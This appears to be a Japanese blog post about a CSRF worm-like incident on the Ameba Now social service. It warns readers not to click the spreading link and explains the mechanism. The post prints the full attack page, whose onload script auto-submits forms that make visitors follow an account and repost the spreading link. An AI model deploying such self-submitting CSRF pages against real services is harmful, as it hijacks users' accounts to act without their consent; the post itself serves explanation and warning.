先日、パソコン版が使えるようになったばかりの「Amebaなう」でこんにちは!!ワーム(のようなもの)が発生しているそうだ。

【緊急】アメーバなう利用中の皆さんへ【ご注意!】|ぼくはまちちゃん!(アメーバ)
お友達の書き込みに「こんにちはこんにちは!!」というものがあったら 絶対にクリックしないでください!!!!

アメーバにアクセスしている状態でこちらのリンクを踏むと感染?する。
アメーバなうでこんにちは! (←今は動かないようですが念のため踏まないでください)

ネットワーク 現場の教科書 増補改訂版 (IDGムックシリーズ)ネットワーク 現場の教科書 増補改訂版 (IDGムックシリーズ)
販売元:アイ・ディ・ジー・ジャパン
発売日:2008-07-16
レビューを見る


クロスサイトスクリプティングに似たクロスサイトリクエストフォージェリ(CSRF)といった技術を使ったワームのようなものらしい。
@IT:「ぼくはまちちゃん」 ――知られざるCSRF攻撃

ちなみにソースはHTMLとJavascriptだけという簡単なもの。
勉強になるので公開しちゃう。いいですよね、製作者さん。
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>アメーバなうでこんにちは!</title>
</head>
<body onload="document.getElementById('f1').submit();document.getElementById('f2').submit()">
<form action="http://now.ameba.jp/api/follow" method="post" id="f1" target="ifr1">
<input type="text" name="followAmebaId" value="主のID">
</form>
<form action="http://ucsnow.ameba.jp/post" method="post" id="f2" target="ifr2">
<input type="text" name="entryText" value="こんにちはこんにちは!! http://bit.ly/7RIjd8">
<input type="text" name="replyEntryId" value="0000">
</form>
<iframe name="ifr1"></iframe>
<iframe name="ifr2"></iframe>
</body>
</html>
このページを開くとonloadで書かれたスクリプトが実行される。
スクリプトにはフォームのサブミット(送信)ボタンを押せと書かれている。
で、そのフォームが「Amebaなう」に上記サイトのリンクを入れた定型文を書き込むフォームと、主さん?をフォローするフォームになっている。
ちなみにiframeはその結果を表示させるためにある。
(followAmebaIdとreplyEntryIdは書き換えました)

まあ、単純に「Amebaなう」内だけではなく、外部からも書き込みやフォローができるようになっていたということだと思う。

とりあえず現在は閉めちゃったみたいで動いていないみたい。
主さんのAmebaなうアカウントも消されちゃったみたいですし。。

一部ではAmebaのマーケティング手法の一つだろうと言っている人もいますが果たして。。

Amebaなう(アメーバなう)
のりささんの投稿したなう | Amebaなう(アメーバなう)

※ この記事は前日の深夜書いたものでして、現在上記「アメーバなうでこんにちは!」のサイトは全く危険性の無いサイトに入れ替わっています。(公開時追記)
※ ブコメで指摘受けたのでワーム(のようなもの)に表記を変えました。
ちなみにワームとは (さらに追記)